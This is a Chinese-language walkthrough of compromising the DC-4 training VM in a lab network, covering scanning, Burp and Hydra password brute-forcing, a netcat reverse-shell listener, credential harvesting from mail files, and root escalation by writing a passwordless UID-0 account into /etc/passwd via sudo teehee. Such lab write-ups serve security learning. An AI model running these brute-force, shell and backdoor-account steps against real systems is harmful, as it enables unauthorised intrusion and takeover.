DC-4靶机渗透过程
- 实验环境:kali ,DC-4(网卡需要一样,这边用的是NAT模式)
- kali:192.168.200.3 DC-4:192.168.200.4
- 使用ifconfig查看kali的IP,在用nmap命令查看该网段的IP地址找出DC-4的IP
┌──(root💀kali)-[/home/shiqi/桌面]
└─# nmap -sP 192.168.200.0/24
-
信息收集,发现开放了22端口和80端口
┌──(root💀kali)-[/home/shiqi/桌面] └─# nmap -sV 192.168.200.4 1 ⚙ Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-19 15:18 CST Nmap scan report for 192.168.200.4 Host is up (0.00021s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http nginx 1.15.10 MAC Address: 00:0C:29:D1:99:66 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
-
访问端口,浏览器访问DC-4的IP地址(根据提示得出登录账号为admin)
-
目录扫描,dirb命令
┌──(root💀kali)-[/usr/share/wordlists] └─# dirb http://192.168.200.4 255 ⨯ 1 START_TIME: Tue Apr 19 19:52:14 2022 URL_BASE: http://192.168.200.4/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.200.4/ ---- ==> DIRECTORY: http://192.168.200.4/css/ ==> DIRECTORY: http://192.168.200.4/images/ + http://192.168.200.4/index.php (CODE:200|SIZE:506) ---- Entering directory: http://192.168.200.4/css/ ---- ---- Entering directory: http://192.168.200.4/images/ ---- ----------------- END_TIME: Tue Apr 19 19:52:24 2022 DOWNLOADED: 13836 - FOUND: 1 ## 得出后台登录主页是http://192.168.200.4/index.php
-
爆破密码(我使用的是burp软件爆破方式)步骤截图省略
##破解出来密码为happy 登录进去发现只有三个选项,使用burp抓包,看是否可以用其他的命令,发现可以
-
反向反弹shell
──(root💀kali)-[/etc/network/interfaces.d] └─# nc -lvp 7777 2 ⚙ listening on [any] 7777 ... 192.168.200.4: inverse host lookup failed: Unknown host connect to [192.168.200.3] from (UNKNOWN) [192.168.200.4] 36838 ls command.php css images whoami www-data cd /home ls charles jim sam ls -l ls -lh sam total 0 ls -lh charles total 0 ls -lh jim 发现jim账户有异常 total 12K drwxr-xr-x 2 jim jim 4.0K Apr 7 2019 backups -rw------- 1 jim jim 528 Apr 6 2019 mbox -rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh ls backups mbox test.sh 进入jim目录发现有三个文件,backups目录下有old-passwd.bak应该是密码,直接复制粘贴创建新文本,而mbox目录没有访问权限
-
hydra 爆破ssh密码 破解 出密码为jibri104
──(root💀kali)-[/home/shiqi/桌面] └─# hydra -l jim -P passwd -T 64 ssh://192.168.200.4:22 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-19 21:30:04 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task [DATA] attacking ssh://192.168.200.4:22/ [STATUS] 178.00 tries/min, 178 tries in 00:01h, 77 to do in 00:01h, 16 active [22][ssh] host: 192.168.200.4 login: jim password: jibril04
-
登录jim账户
┌──(root💀kali)-[/home/shiqi/桌面] └─# ssh jim@192.168.200.4 im@dc-4:~$ su root Password: su: Authentication failure 尝试提权,发现不可以 im@dc-4:~$ ls backups mbox test.sh jim@dc-4:~$ cat mbox 再次查看上一步权限不够的文件,发现可以查看成功,是一封邮件,是root用户本地发送的 From root@dc-4 Sat Apr 06 20:20:04 2019 Return-path: <root@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000 Received: from root by dc-4 with local (Exim 4.89)
jim@dc-4:~$ cd /var/mail/ jim@dc-4:/var/mail$ ls jim jim@dc-4:/var/mail$ cat jim Password is: ^xHhA&hvim0y 获得用户Charles密码^xHhA&hvim0y
-
i切换到charles用户
jim@dc-4:/var/mail$ su charles Password: charles@dc-4:/var/mail$ 尝试提权发现可以sudo免密teech harles@dc-4:/var/mail$ sudo -l (root) NOPASSWD: /usr/bin/teehee
-
创建admin并授权免密登录
charles@dc-4:/var/mail$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd admin::0:0:::/bin/bash charles@dc-4:/var/mail$ su admin root@dc-4:/var/mail# ls jim root@dc-4:/var/mail# whoami root 用find命令找出flag文件所在位置 oot@dc-4:/etc# find / -name flag* /sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/virtual/net/lo/flags /root/flag.txt root@dc-4:/etc# cd /root root@dc-4:/root# cat flag.txt 显示出flag即成功
-
-
-
-